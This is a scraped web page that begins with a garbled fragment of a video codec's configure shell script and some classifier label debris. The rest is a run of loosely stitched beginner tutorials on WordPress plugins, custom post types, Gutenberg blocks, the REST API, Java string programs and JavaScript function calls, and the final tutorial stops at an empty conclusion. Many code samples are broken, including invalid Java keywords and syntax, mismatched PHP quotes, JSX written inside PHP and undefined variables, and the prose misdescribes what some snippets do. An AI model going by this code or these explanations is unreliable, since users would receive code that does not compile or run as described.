The function has got a very long and hard life. It has been introduced to play beeps through the hardware beeper using the 8245 programmable timer. As more and more PCs came without a beeper, this function became obsolete, but in Windows 7 it has been rewritten to play beeps using the regular sound card API.
Yet, behind the simplicity of this function hides the complexity of all the Windows sound APIs. There has been MME released in 1991, which is the default choice for audio because it’s well supported. However, MME is known to have very high playback latency and probably won’t be suitable for most audio apps. There is also WASAPI released in 2007, which has much lower latency, especially when used in exclusive mode (i.e. when you app runs - the user can’t listen to Spotify or any other app, your app owns the sound hardware exclusively). WASAPI is often a good choice for audio apps, but there is also DirectSound, which basically wraps WASAPI for DirectX interfacing.
If in doubt - use WASAPI.
Linux
Audio is one of a few areas, where Linux APIs are no better than the rest of the platforms. First of all, there is ALSA, which is part of the kernel itself. ALSA works directly with the hardware and if you would like your app to work exclusively with sound - ALSA could probably be a good compromise between complexity and performance. If you are bulding a synth or a sampler for a Raspberry Pi - ALSA could be a good choice.
Then, there is PulseAudio, which is a modern desktop abstraction layer built on top of ALSA. It routes sound from various apps and tries to mix the audio streams so that the critial apps would not suffer from latency issues. Although PulseAudio brings many features that would not be possible with ALSA, like routing sound via internet, most musician apps don’t use it.
They use JACK Audio Connection Kit. JACK was created for professional musicians and it cares about real-time playback, whereas PulseAudio was made for casual users who might tolerate some latency from their youtube playback. JACK connects audio apps with minimal latency, but keep in mind that it still works on top of ALSA, so if your app would be the only audio app running (i.e. if you are making a drum machine from an old Raspberry Pi) - then ALSA would be easier to use and would have a better performance.
Making a beeper function with ALSA is actually not so hard. We need to open the default audio device, configure it to use a well-supported sampling rate and sample format, and start writing data into it. Audio data can be a sawtooth wave, as described in the previous audio article.
int beep(int freq, int ms) {
static void *pcm = NULL;
if (pcm == NULL) {
if (snd_pcm_open(&pcm, "default", 0, 0)) {
return -1;
}
snd_pcm_set_params(pcm, 1, 3, 1, 8000, 1, 20000);
}
unsigned char buf[2400];
long frames;
long phase;
for (int i = 0; i < ms / 50; i++) {
snd_pcm_prepare(pcm);
for (int j = 0; j < sizeof(buf); j++) {
buf[j] = freq > 0 ? (255 * j * freq / 8000) : 0;
}
int r = snd_pcm_writei(pcm, buf, sizeof(buf));
if (r < 0) {
snd_pcm_recover(pcm, r, 0);
}
}
return 0;
}
Here we use synchronous API and we don’t check for errors to keep the function small and simple. Synchronous blocking I/O is probably not the best option for serious audio applications, and fortunately ALSA comes with various transfer methods and various modes of operation: https://www.alsa-project.org/alsa-doc/alsa-lib/pcm.html. But for our simple use case it’s totally fine.
If in doubt - use ALSA; if you have to cooperate with other audio apps - use JACK.
macOS
This one is rather simple, but not easy at all. MacOS has CoreAudio framework, responsible for audio functionality on both, desktop and iOS. CoreAudio itself is a low-level API, tightly integrated with OS to optimize latency and performance. To play some sound with CoreAudio one would have to create an AudioUnit (audio plugin).
AudioUnit API is a little verbose, but easy to understand, here’s how to create a new AudioUnit:
AudioComponent output;
AudioUnit unit;
AudioComponentDescription descr;
AURenderCallbackStruct cb;
AudioStreamBasicDescription stream;
descr.componentType = kAudioUnitType_Output,
descr.componentSubType = kAudioUnitSubType_DefaultOutput,
descr.componentManufacturer = kAudioUnitManufacturer_Apple,
// Actual sound will be generated asynchronously in the callback tone_cb
cb.inputProc = tone_cb;
stream.mFormatID = kAudioFormatLinearPCM;
stream.mFormatFlags = 0;
stream.mSampleRate = 8000;
stream.mBitsPerChannel = 8;
stream.mChannelsPerFrame = 1;
stream.mFramesPerPacket = 1;
stream.mBytesPerFrame = 1;
stream.mBytesPerPacket = 1;
output = AudioComponentFindNext(NULL, &descr);
AudioComponentInstanceNew(output, &unit);
AudioUnitSetProperty(unit, kAudioUnitProperty_SetRenderCallback,
kAudioUnitScope_Input, 0, &cb, sizeof(cb));
AudioUnitSetProperty(unit, kAudioUnitProperty_StreamFormat,
kAudioUnitScope_Input, 0, &stream, sizeof(stream));
AudioUnitInitialize(unit);
AudioOutputUnitStart(unit);
This code only creates and starts a new AudioUnit, the actual sound generation would happen asynchronously in the callback:
static OSStatus tone_cb(void *inRefCon,
AudioUnitRenderActionFlags *ioActionFlags,
const AudioTimeStamp *inTimeStamp, UInt32 inBusNumber,
UInt32 inNumberFrames, AudioBufferList *ioData) {
unsigned int frame;
unsigned char *buf = ioData->mBuffers[0].mData;
unsigned long i = 0;
for (i = 0; i < inNumberFrames; i++) {
buf[i] = beep_freq > 0 ? (255 * theta * beep_freq / 8000) : 0;
theta++;
counter--;
}
return 0;
}
This callback generates sound similarly to how we did it with ALSA, but it is called asynchronously when CoreAudio thinks that audio buffer is almost empty and needs to be filled with new audio samples.
Such asynchronous approach to sound generation is very common, and almost every modern audio library supports it. If you want to build a music app - you should probably design it with asynchronous playback in mind.
If in doubt - use CoreAudio.
Sounds like too much work
If you are building a music app - you may follow the same path, implement audio backend for WASAPI, ALSA and CoreAudio. Actually it’s not that hard. You may see the full sources of beep, it’s roughly 100 lines of code for all three platforms.
However, there is a number of good cross-platform libraries, such as:
Some poeple prefer using JUCE for cross-platform audio apps, but it has its own limitations. Audio ecosystem may appear complex, and there are too many choices, but most of them are good ones. So keep playing!
I hope you’ve enjoyed this article. You can follow – and contribute to – on Github, Mastodon, Twitter or subscribe via rss.
Dec 13, 2020
|
__label__pos
| 0.781062 |
Logo: Relish
1. Sign in
Project: RSpec Expectations 2.11
implicit docstrings
As an RSpec user
I want examples to generate their own names
So that I can reduce duplication between example names and example code
Scenarios
run passing examples
Given
a file named "implicit_docstrings_spec.rb" with:
describe "Examples with no docstrings generate their own:" do
specify { 3.should be < 5 }
specify { [1,2,3].should include(2) }
specify { [1,2,3].should respond_to(:size) }
end
When
I run rspec ./implicit_docstrings_spec.rb -fdoc
Then
the output should contain "should be < 5"
And
the output should contain "should include 2"
And
the output should contain "should respond to #size"
run failing examples
Given
a file named "failing_implicit_docstrings_spec.rb" with:
describe "Failing examples with no descriptions" do
# description is auto-generated as "should equal(5)" based on the last #should
it do
3.should equal(2)
5.should equal(5)
end
it { 3.should be > 5 }
it { [1,2,3].should include(4) }
it { [1,2,3].should_not respond_to(:size) }
end
When
I run rspec ./failing_implicit_docstrings_spec.rb -fdoc
Then
the output should contain "should equal 2"
And
the output should contain "should be > 5"
And
the output should contain "should include 4"
And
the output should contain "should not respond to #size"
Last published over 4 years ago by dchelimsky.
|
__label__pos
| 0.997166 |
我的位置: 首页 > 学习专区 > .NET技术 > C#中的索引器的简单理解和用法
C#中的索引器的简单理解和用法
2014-04-24 09:47:51
来源:
[导读] 索引器是一种特殊的类成员,它能够让对象以类似数组的方式来存取,使程序看起来更为直观,更容易编写。1、索引器的定义C 中的类成员可以是
索引器是一种特殊的类成员,它能够让对象以类似数组的方式来存取,使程序看起来更为直观,更容易编写。
1、索引器的定义
C#中的类成员可以是任意类型,包括数组和集合。当一个类包含了数组和集合成员时,索引器将大大简化对数组或集合成员的存取操作。
定义索引器的方式与定义属性有些类似,其一般形式如下:
[修饰符] 数据类型 this[索引类型 index]
{
get{//获得属性的代码}
set{ //设置属性的代码}
}
修饰符包括 public,protected,private,internal,new,virtual,sealed,override, abstract,extern.
数据类型是表示将要存取的数组或集合元素的类型。
索引器类型表示该索引器使用哪一类型的索引来存取数组或集合元素,可以是整数,可以是字符串;this表示操作本对象的数组或集合成员,可以简单把它理解成索引器的名字,因此索引器不能具有用户定义的名称。 例如:
class Z
{
//可容纳100个整数的整数集
private long[] arr = new long[100];
//声明索引器
public long this[int index]
{
get
{ //检查索引范围
if (index < 0 || index >= 100)
{
return 0;
}
else
{
return arr[index];
}
}
set
{
if (!(index < 0 || index >= 100))
{
arr[index] = value;
}
}
}
2、索引器的使用
通过索引器可以存取类的实例的数组成员,操作方法和数组相似,一般形式如下:
对象名[索引]
其中索引的数据类型必须与索引器的索引类型相同。例如:
Z z=new z();
z[0]=100;
z[1]=101;
Console.WriteLine(z[0]);
表示先创建一个对象z,再通过索引来引用该对象中的数组元素。
C#中并不将索引器的类型限制为整数。例如,可以对索引器使用字符串。通过搜索集合内的字符串并返回相应的值,可以实现此类的索引器。由于访问器可以被重载,字符串和整数版本可以共存。
example:
class DayCollection
{
string[] days={"Sun","Mon","Tues","Wed","Thurs","Fri","Sat"};
private int GetDay(string testDay)
{
int i=0;
foreach(string day in days)
{
if(day==testDay)
return i;
i++;
}
return -1;
}
public int this[string day]
{
get{return (GetDay(day))}
}
}
static void Main(string[] args)
{
DayCollection week=new DayCollection();
Console.WriteLine("Fri:{0}",week["Fri"]);
Console.WriteLine("ABC:{0}",week["ABC"]);
}
结果:Fri:5
ABC:-1
3、接口中的索引器
在 接口中也可以声明索引器,接口索引器与类索引器的区别有两个:一是接口索引器不使用修饰符;二是接口索引器只包含访问器get或set,没有实现语句。访 问器的用途是指示索引器是可读写、只读还是只写的,如果是可读写的,访问器get或set均不能省略;如果只读的,省略set访问器;如果是只写的,省略 get访问器。例如:
public interface IAddress
{
string this[int index]{get;set;}
string Address{get;set;}
string Answer();
}
表示所声明的接口IAddress包含3个成员:一个索引器、一个属性和一个方法,其中,索引器是可读写的。
4、索引器与属性的比较
索引器与属性都是类的成员,语法上非常相似。索引器一般用在自定义的集合类中,通过使用索引器来操作集合对象就如同使用数组一样简单;而属性可用于任何自定义类,它增强了类的字段成员的灵活性。
属性 索引器
允许调用方法,如同公共数据成员 允许调用对象上的方法,如同对象是一个数组
可通过简单的名称进行访问 可通过索引器进行访问
可以为静态成员或实例成员 必须为实例成员
其get访问器没有参数 其get访问器具有与索引器相同的形参表
其set访问器包含隐式value参数 除了value参数外,其set访问器还具有与索引器相同的形参表
相关热词搜索:
评论
热点专题
>>
相关文章推荐
>>
|
__label__pos
| 0.96851 |
LISP-STAT: An Object-Oriented Environment for Statistical by Luke Tierney
By Luke Tierney
Written for the pro statistician or graduate information scholar, the first goal of this publication is to explain a procedure, in response to the LISP language, for statistical computing and dynamic portraits to teach the way it can be utilized as a good platform for a variety of statistical computing projects starting from easy calculations to customizing dynamic graphs. furthermore, it introduces object-oriented programming and pictures programming in a statistical context. The dialogue of those principles relies at the Lisp-Stat procedure; readers with entry to any such method can reproduce the examples provided and use them as a foundation for additional experimentation and examine.
Show description
Read Online or Download LISP-STAT: An Object-Oriented Environment for Statistical Computing and Dynamic Graphics (Wiley Series in Probability and Statistics) PDF
Similar object-oriented design books
Pro Active Record: Databases with Ruby and Rails
Seasoned energetic checklist is helping you're taking benefit of the total strength of your database engine from inside your Ruby courses and Rails purposes. ActiveRecord, a part of the magic that makes the Rails framework so robust and straightforward to take advantage of, is the version part of Rails model/view/controller framework. Its an object-relational mapping library permitting you to have interaction with databases from either Ruby and Rails purposes.
Liferay 6.2 User Interface Development
Liferay employs a really good theming procedure in an effort to swap the appear and feel of the consumer interfaces. Liferay Portal presents structure templates on the way to describe how a number of columns and rows are prepared to exhibit portlets. It additionally presents subject matters that may be used to customise the final feel and appear of sites and websites.
Control flow semantics
Keep an eye on movement Semantics offers a unified, formal remedy of the semantics of a large spectrum of keep watch over stream notions as present in sequential, concurrent, good judgment, object-oriented, and sensible programming languages. while in additional conventional ways one makes a speciality of input/output habit, during this paintings equivalent realization is dedicated to finite and limitless computations, the latter stimulated through the starting to be value of reactive platforms.
Apache Camel Developer's Cookbook
Apache Camel is a de-facto regular for constructing integrations in Java, and is predicated on well-understood firm Integration styles. it truly is used inside many advertisement and open resource integration items. Camel makes universal integration initiatives effortless whereas nonetheless supplying the developer with the ability to customise the framework whilst the placement calls for it.
Extra resources for LISP-STAT: An Object-Oriented Environment for Statistical Computing and Dynamic Graphics (Wiley Series in Probability and Statistics)
Sample text
2, we can put ethanol arid oxygen in a scatterplot and sugar in a histogram. 12. he name-list function to generate a window with a list of labels in it. This window can be Iinked with any plot, and selecting a label in a name list will then highlight the corresponding points in the linked plots. You can use the -17 name-list function with a nuinerical argument; for example. (name-list 10) gmeratm a name list with rlic lab& YY , . . '9", or you rail give it a list of labels of your own. 2. 5 Modifying a Scatterplot After producing a scatterplot of a data set, you might like to add a line, for example, a regression line.
2 above. and :point-showingare useful for dynamic simulations. Here is the help information for :pointselected in a histograin: > (send h :help :point-selected) :POINT-SELECTED Method args: (point &optional selected) Sets or returns selection status (true or NIL) of POINT. Sends :ADJUST-SCREEN message if states are set. Vectorized. '"dotimes is onc of several Lisp looping constructs It is a special form with the syntax (dotimes ( ( a a t ) ( c o u n t ) ) ( ~ ~ F J T - } . . ). The loop is repeated (count) times, with (tlar) hound to 0 , 1, .
The term vectorozed in a function's documentation means the function can be applied to arguments that are lists; the result is a Kist of the results of applying the function to each element. A related term appearing in the documentation of some functions is vector reducing. A function is vector reducing if it is applied recursively to its arguments until a single number results. The functions sum,prod,max,and min are vector reducing. ing of the symbols that contain "norin" as part of their name > (apropos 'norm) NORMAL-QUANT NORMAL-RAND NORMAL-CDF NORMAL-DENS NORMAL BIVNORM-CDF NORM and then w e help to ask for more information about each of these symbols.
Download PDF sample
Rated 4.74 of 5 – based on 26 votes
|
__label__pos
| 0.771922 |
Can You Delete A Sandbox Salesforce?
Why we Cannot delete user in Salesforce?
Hi Saurabh, You cannot delete users from Salesforce.
You can remove their license or deactivate them to remove access to the system, but because they may still own records, they cannot be deleted..
How do I delete my sandbox account?
To delete an account: Log in to the Developer Dashboard and navigate to the Sandbox>>Accounts page. In the Manage Accounts column, click the icon associated with the account you want to manage. Click Delete.
Can we delete users in Salesforce?
You can’t delete a user, but you can deactivate an account so a user can no longer log in to Salesforce.
What is Sandbox Salesforce?
Introduction to Sandboxes Sandbox is a copy of your production organization. You can create multiple copies of your organization in separate environments for different purposes such as development, testing and training, without compromising the data and applications in your production organization.
What happens when you refresh a sandbox Salesforce?
Refreshing a sandbox updates the sandbox’s metadata from its source org. If the sandbox is a clone or if it uses a sandbox template, the refresh process updates the org’s data in addition to its metadata.
How do I find my Salesforce Sandbox?
To access your sandbox, click the link in the notification email. Users can log in to the sandbox at https://test.salesforce.com by appending . sandbox_name to their Salesforce usernames.
How often can you refresh a Salesforce Sandbox?
every 29 daysSALESFORCE SANDBOX REFRESH LIMITS For Full Copy sandboxes, you can refresh once every 29 days. Partial Copy sandboxes contain only a fraction of your production data and so can be refreshed more frequently.
How long does a sandbox refresh take salesforce?
For full sandboxes plan for a minimum of 48 hours as the timing of the refresh is dependent on the salesforce Queue and also amount of data. If you have multiple lines of business using one salesforce org, create a sandbox template for each business depending on business requirement.
What happens when you deactivate a user in Salesforce?
The deactivated user is the file owner until an admin reassigns the files to an active user. … You can create and edit accounts, opportunities, and custom object records that are owned by inactive users. For example, you can edit the Account Name field on an opportunity record that’s owned by an inactive user.
How do I turn off sandbox?
1. Enable or Disable Windows Sandbox using the Control panelHenceforth locate Windows Sandbox from the list under the opened window.Thereafter activate or deactivate the checkbox to enable or disable this option respectively.Tap the OK button and restart your PC to apply the changes.
What does no sandbox mean in Chrome?
Google Chrome sandboxing featureGoogle Chrome sandboxing feature: ” –no-sandbox” switch We have some web developers who want Google Chrome for testing purposes. For some reason it crashes upon launching unless we disable the sandboxing feature by typing ” –no-sandbox” in the shortcut target. … The sandbox is the “stealth” browsing technology.
What is Apex class in Salesforce Sandbox?
With help of this Sandbox Refresh Apex Class, you can process data, execute script for business logic or create some test data in your created or refreshed sandbox. This feature is very useful when a Salesforce instance is refreshed frequently.
When should you refresh a sandbox Salesforce?
29 daysYou can refresh a Full sandbox 29 days after you created or last refreshed it. If you delete a Full sandbox within those 29 days, you need to wait until after the 29 day period, from the date of last refresh or creation, to replace it.
What is Sandbox coloring?
The Sandbox Coloring app takes coloring by number into the digital age, by offering coloring pages for mobile devices. … The Sandbox Coloring app is a color-by-number app that presents coloring pages with color legends which users fill in pixel by pixel.
What is the purpose of the sandbox?
A sandbox is a safe isolated environment that replicates an end user operating environment where you can run code, observe it and rate it based on activity rather than attributes. You can run executable files, allow contained network traffic and more that can contain hidden malware in a sandbox.
How do I delete photos from sandbox?
To delete a saved sandbox: In the Saved Sandboxes dashboard, click the Actions button at the end of the row and select Delete. A “Deletion in progress” message is displayed next to the name of the saved sandbox.
How do I remove sandbox from Chrome?
How to Disable Chrome SandboxCreate a desktop shortcut for the Google Chrome application, if you do not already have one. … Right-click on the shortcut, and click “Properties.”Click the “Shortcut” tab.Type ” –no-sandbox” (without quotes) after the path to the application in the “Target” input box.More items…
Does sandbox coloring use data?
The app is a color by number coloring book, but on your phone. … The app only requires data, unless there is a need to download new pictures to color.
What is the difference between freeze and deactivate in Salesforce?
Freeze – Temporarily disable the account. Good for returning users. Deactivate – Suspend the user account entirely and they are not returning users.
How do you get rid of a sandbox environment?
Delete a sandbox from SetupLog in to your organization.Click Setup.Enter sandboxes in the ‘Quick Find’ box and click Sandboxes.Click Del next to the sandbox you want to delete.Select I understand the operation I am about to perform.Click Delete.
|
__label__pos
| 0.999637 |
Notation for a coinductive type
I made something like a list that keeps repeating using CoInductive with
CoInductive ilist {A : Type} : Type :=
| icons : A -> ilist -> ilist.
and I can construct its objects without error:
(* Means a list like [[3;4; 3;4; 3;4; 3;4; .....]] *)
CoFixpoint foo := (icons 3 (icons 4 foo)).
How can we make a notation to do the list construction?
I was trying to make a notation that will allow constructing the same list as above as: [[ 3; 4; NIL ]].
Where NIL is used to denote the end of the ‘basic part’ (ie, the part which keeps repeating in the list) of the list.
So I tried:
Notation "[[ x ; y ; .. ; z ; 'NIL' ]]" := (cofix Foo : ilist :=
(icons x (icons y .. (icons z Foo) .. )))
That ran okay.
But using the notation itself didn’t work.
Compute [[ NIL ]].
(*
Syntax error: ';' expected after [term level 200] (in [term]).
*)
Compute [[ 1 ; 2 ; 3 ; NIL ]].
(*
Syntax error: ';' or ';' 'NIL' ']]' expected (in [term]).
*)
What am I missing here?
Not sure what the issue is with the notation you want (I am not a notation expert), but if this is good enough for you,
Notation "[[ x ; .. ; z ]]" := (cofix Foo : ilist :=
(icons x .. (icons z Foo) .. )).
should fix your second example. As for the first one, you could add a specific notation (as is done e.g. for the empty list), but the term you would bind it too (cofix Foo : ilist := Foo) is not valid because it is not guarded.
|
__label__pos
| 0.65409 |
#!/bin/sh ## ## configure ## ## This script is the front-end to the build system. It provides a similar ## interface to standard configure scripts with some extra bits for dealing ## with toolchains that differ from the standard POSIX interface and ## for extracting subsets of the source tree. In theory, reusable parts ## of this script were intended to live in build/make/configure.sh, ## but in practice, the line is pretty blurry. ## ## This build system is based in part on the FFmpeg configure script. ## #source_path="`dirname \"$0\"`" source_path=${0%/*} . "${source_path}/build/make/configure.sh" show_help(){ show_help_pre cat << EOF Advanced options: ${toggle_libs} libraries ${toggle_examples} examples ${toggle_docs} documentation ${toggle_unit_tests} unit tests ${toggle_decode_perf_tests} build decoder perf tests with unit tests ${toggle_encode_perf_tests} build encoder perf tests with unit tests --cpu=CPU tune for the specified CPU (ARM: cortex-a8, X86: sse3) --libc=PATH path to alternate libc --size-limit=WxH max size to allow in the decoder --as={yasm|nasm|auto} use specified assembler [auto, yasm preferred] --sdk-path=PATH path to root of sdk (android builds only) ${toggle_codec_srcs} in/exclude codec library source code ${toggle_debug_libs} in/exclude debug version of libraries ${toggle_static_msvcrt} use static MSVCRT (VS builds only) ${toggle_aom_highbitdepth} use high bit depth (10/12) profiles ${toggle_better_hw_compatibility} enable encoder to produce streams with better hardware decoder compatibility ${toggle_av1} AV1 codec support ${toggle_internal_stats} output of encoder internal stats for debug, if supported (encoders) ${toggle_postproc} postprocessing ${toggle_av1_postproc} av1 specific postprocessing ${toggle_multithread} multithreaded encoding and decoding ${toggle_spatial_resampling} spatial sampling (scaling) support ${toggle_realtime_only} enable this option while building for real-time encoding ${toggle_onthefly_bitpacking} enable on-the-fly bitpacking in real-time encoding ${toggle_error_concealment} enable this option to get a decoder which is able to conceal losses ${toggle_coefficient_range_checking} enable decoder to check if intermediate transform coefficients are in valid range ${toggle_runtime_cpu_detect} runtime cpu detection ${toggle_shared} shared library support ${toggle_static} static library support ${toggle_small} favor smaller size over speed ${toggle_postproc_visualizer} macro block / block level visualizers ${toggle_multi_res_encoding} enable multiple-resolution encoding ${toggle_temporal_denoising} enable temporal denoising and disable the spatial denoiser ${toggle_av1_temporal_denoising} enable av1 temporal denoising ${toggle_webm_io} enable input from and output to WebM container ${toggle_libyuv} enable libyuv ${toggle_accounting} enable bit accounting Codecs: Codecs can be selectively enabled or disabled individually, or by family: --disable- is equivalent to: --disable--encoder --disable--decoder Codecs available in this distribution: EOF #restore editor state ' family=""; last_family=""; c=""; str=""; for c in ${CODECS}; do family=${c%_*} if [ "${family}" != "${last_family}" ]; then [ -z "${str}" ] || echo "${str}" str="$(printf ' %10s:' ${family})" fi str="${str} $(printf '%10s' ${c#*_})" last_family=${family} done echo "${str}" show_help_post } ## ## BEGIN APPLICATION SPECIFIC CONFIGURATION ## # all_platforms is a list of all supported target platforms. Maintain # alphabetically by architecture, generic-gnu last. all_platforms="${all_platforms} arm64-darwin-gcc" all_platforms="${all_platforms} arm64-linux-gcc" all_platforms="${all_platforms} armv6-linux-rvct" all_platforms="${all_platforms} armv6-linux-gcc" all_platforms="${all_platforms} armv6-none-rvct" all_platforms="${all_platforms} armv7-android-gcc" #neon Cortex-A8 all_platforms="${all_platforms} armv7-darwin-gcc" #neon Cortex-A8 all_platforms="${all_platforms} armv7-linux-rvct" #neon Cortex-A8 all_platforms="${all_platforms} armv7-linux-gcc" #neon Cortex-A8 all_platforms="${all_platforms} armv7-none-rvct" #neon Cortex-A8 all_platforms="${all_platforms} armv7-win32-vs11" all_platforms="${all_platforms} armv7-win32-vs12" all_platforms="${all_platforms} armv7-win32-vs14" all_platforms="${all_platforms} armv7s-darwin-gcc" all_platforms="${all_platforms} armv8-linux-gcc" all_platforms="${all_platforms} mips32-linux-gcc" all_platforms="${all_platforms} mips64-linux-gcc" all_platforms="${all_platforms} sparc-solaris-gcc" all_platforms="${all_platforms} x86-android-gcc" all_platforms="${all_platforms} x86-darwin8-gcc" all_platforms="${all_platforms} x86-darwin8-icc" all_platforms="${all_platforms} x86-darwin9-gcc" all_platforms="${all_platforms} x86-darwin9-icc" all_platforms="${all_platforms} x86-darwin10-gcc" all_platforms="${all_platforms} x86-darwin11-gcc" all_platforms="${all_platforms} x86-darwin12-gcc" all_platforms="${all_platforms} x86-darwin13-gcc" all_platforms="${all_platforms} x86-darwin14-gcc" all_platforms="${all_platforms} x86-darwin15-gcc" all_platforms="${all_platforms} x86-iphonesimulator-gcc" all_platforms="${all_platforms} x86-linux-gcc" all_platforms="${all_platforms} x86-linux-icc" all_platforms="${all_platforms} x86-os2-gcc" all_platforms="${all_platforms} x86-solaris-gcc" all_platforms="${all_platforms} x86-win32-gcc" all_platforms="${all_platforms} x86-win32-vs10" all_platforms="${all_platforms} x86-win32-vs11" all_platforms="${all_platforms} x86-win32-vs12" all_platforms="${all_platforms} x86-win32-vs14" all_platforms="${all_platforms} x86_64-android-gcc" all_platforms="${all_platforms} x86_64-darwin9-gcc" all_platforms="${all_platforms} x86_64-darwin10-gcc" all_platforms="${all_platforms} x86_64-darwin11-gcc" all_platforms="${all_platforms} x86_64-darwin12-gcc" all_platforms="${all_platforms} x86_64-darwin13-gcc" all_platforms="${all_platforms} x86_64-darwin14-gcc" all_platforms="${all_platforms} x86_64-darwin15-gcc" all_platforms="${all_platforms} x86_64-iphonesimulator-gcc" all_platforms="${all_platforms} x86_64-linux-gcc" all_platforms="${all_platforms} x86_64-linux-icc" all_platforms="${all_platforms} x86_64-solaris-gcc" all_platforms="${all_platforms} x86_64-win64-gcc" all_platforms="${all_platforms} x86_64-win64-vs10" all_platforms="${all_platforms} x86_64-win64-vs11" all_platforms="${all_platforms} x86_64-win64-vs12" all_platforms="${all_platforms} x86_64-win64-vs14" all_platforms="${all_platforms} generic-gnu" # all_targets is a list of all targets that can be configured # note that these should be in dependency order for now. all_targets="libs examples docs" # all targets available are enabled, by default. for t in ${all_targets}; do [ -f "${source_path}/${t}.mk" ] && enable_feature ${t} done if ! perl --version >/dev/null; then die "Perl is required to build" fi if [ "`cd \"${source_path}\" && pwd`" != "`pwd`" ]; then # test to see if source_path already configured if [ -f "${source_path}/aom_config.h" ]; then die "source directory already configured; run 'make distclean' there first" fi fi # check installed doxygen version doxy_version=$(doxygen --version 2>/dev/null) doxy_major=${doxy_version%%.*} if [ ${doxy_major:-0} -ge 1 ]; then doxy_version=${doxy_version#*.} doxy_minor=${doxy_version%%.*} doxy_patch=${doxy_version##*.} [ $doxy_major -gt 1 ] && enable_feature doxygen [ $doxy_minor -gt 5 ] && enable_feature doxygen [ $doxy_minor -eq 5 ] && [ $doxy_patch -ge 3 ] && enable_feature doxygen fi # disable codecs when their source directory does not exist [ -d "${source_path}/av1" ] || disable_codec av1 # install everything except the sources, by default. sources will have # to be enabled when doing dist builds, since that's no longer a common # case. enabled doxygen && enable_feature install_docs enable_feature install_bins enable_feature install_libs enable_feature static enable_feature optimizations enable_feature dependency_tracking enable_feature spatial_resampling enable_feature multithread enable_feature os_support enable_feature temporal_denoising CODECS=" av1_encoder av1_decoder " CODEC_FAMILIES=" av1 " ARCH_LIST=" arm mips x86 x86_64 " ARCH_EXT_LIST_X86=" mmx sse sse2 sse3 ssse3 sse4_1 avx avx2 " ARCH_EXT_LIST=" edsp media neon neon_asm mips32 dspr2 msa mips64 ${ARCH_EXT_LIST_X86} " HAVE_LIST=" ${ARCH_EXT_LIST} aom_ports pthread_h unistd_h " EXPERIMENT_LIST=" fp_mb_stats emulate_hardware clpf dering var_tx rect_tx ref_mv dual_filter ext_tx tx64x64 sub8x8_mc ext_intra filter_intra ext_inter ext_interp ext_refs global_motion new_quant supertx ans ec_multisymbol loop_restoration ext_partition ext_partition_types ext_tile motion_var warped_motion entropy bidir_pred bitstream_debug alt_intra palette daala_ec pvq cb4x4 frame_size delta_q adapt_scan filter_7bit parallel_deblocking tile_groups ec_adapt rd_debug reference_buffer coef_interleave " CONFIG_LIST=" dependency_tracking external_build install_docs install_bins install_libs install_srcs debug gprof gcov rvct gcc msvs pic big_endian codec_srcs debug_libs dequant_tokens dc_recon runtime_cpu_detect postproc av1_postproc multithread internal_stats ${CODECS} ${CODEC_FAMILIES} encoders decoders static_msvcrt spatial_resampling realtime_only onthefly_bitpacking error_concealment shared static small postproc_visualizer os_support unit_tests webm_io libyuv accounting decode_perf_tests encode_perf_tests multi_res_encoding temporal_denoising av1_temporal_denoising coefficient_range_checking aom_highbitdepth better_hw_compatibility experimental size_limit aom_qm ${EXPERIMENT_LIST} " CMDLINE_SELECT=" dependency_tracking external_build extra_warnings werror install_docs install_bins install_libs install_srcs debug gprof gcov pic optimizations ccache runtime_cpu_detect thumb libs examples docs libc as size_limit codec_srcs debug_libs dequant_tokens dc_recon postproc av1_postproc multithread internal_stats ${CODECS} ${CODEC_FAMILIES} static_msvcrt spatial_resampling realtime_only onthefly_bitpacking error_concealment shared static small postproc_visualizer unit_tests webm_io libyuv accounting decode_perf_tests encode_perf_tests multi_res_encoding temporal_denoising av1_temporal_denoising coefficient_range_checking better_hw_compatibility aom_highbitdepth experimental aom_qm tile_groups " process_cmdline() { for opt do optval="${opt#*=}" case "$opt" in --disable-codecs) for c in ${CODEC_FAMILIES}; do disable_codec $c; done ;; --enable-?*|--disable-?*) eval `echo "$opt" | sed 's/--/action=/;s/-/ option=/;s/-/_/g'` if is_in ${option} ${EXPERIMENT_LIST}; then if enabled experimental; then ${action}_feature $option else log_echo "Ignoring $opt -- not in experimental mode." fi elif is_in ${option} "${CODECS} ${CODEC_FAMILIES}"; then ${action}_codec ${option} else process_common_cmdline $opt fi ;; *) process_common_cmdline "$opt" ;; esac done } post_process_cmdline() { c="" # Enable all detected codecs, if they haven't been disabled for c in ${CODECS}; do soft_enable $c; done # Enable the codec family if any component of that family is enabled for c in ${CODECS}; do enabled $c && enable_feature ${c%_*} done # Set the {en,de}coders variable if any algorithm in that class is enabled for c in ${CODECS}; do enabled ${c} && enable_feature ${c##*_}s done # Enable ref_mv by default soft_enable ref_mv # Enable daala_ec by default ! enabled ans && soft_enable daala_ec # Fix up experiment dependencies enabled ec_adapt && enable_feature ec_multisymbol enabled ec_multisymbol && ! enabled ans && soft_enable daala_ec enabled ec_multisymbol && ! enabled daala_ec && soft_enable ans enabled daala_ec && enable_feature ec_multisymbol if enabled global_motion && (enabled ext_inter || enabled dual_filter); then log_echo "global_motion currently not compatible with ext_inter" log_echo "and dual_filter. Disabling global_motion." disable_feature global_motion fi } process_targets() { enabled child || write_common_config_banner write_common_target_config_h ${BUILD_PFX}aom_config.h write_common_config_targets # Calculate the default distribution name, based on the enabled features cf="" DIST_DIR=aom for cf in $CODEC_FAMILIES; do if enabled ${cf}_encoder && enabled ${cf}_decoder; then DIST_DIR="${DIST_DIR}-${cf}" elif enabled ${cf}_encoder; then DIST_DIR="${DIST_DIR}-${cf}cx" elif enabled ${cf}_decoder; then DIST_DIR="${DIST_DIR}-${cf}dx" fi done enabled debug_libs && DIST_DIR="${DIST_DIR}-debug" enabled codec_srcs && DIST_DIR="${DIST_DIR}-src" ! enabled postproc && ! enabled av1_postproc && DIST_DIR="${DIST_DIR}-nopost" ! enabled multithread && DIST_DIR="${DIST_DIR}-nomt" ! enabled install_docs && DIST_DIR="${DIST_DIR}-nodocs" DIST_DIR="${DIST_DIR}-${tgt_isa}-${tgt_os}" case "${tgt_os}" in win*) enabled static_msvcrt && DIST_DIR="${DIST_DIR}mt" || DIST_DIR="${DIST_DIR}md" DIST_DIR="${DIST_DIR}-${tgt_cc}" ;; esac if [ -f "${source_path}/build/make/version.sh" ]; then ver=`"$source_path/build/make/version.sh" --bare "$source_path"` DIST_DIR="${DIST_DIR}-${ver}" VERSION_STRING=${ver} ver=${ver%%-*} VERSION_PATCH=${ver##*.} ver=${ver%.*} VERSION_MINOR=${ver##*.} ver=${ver#v} 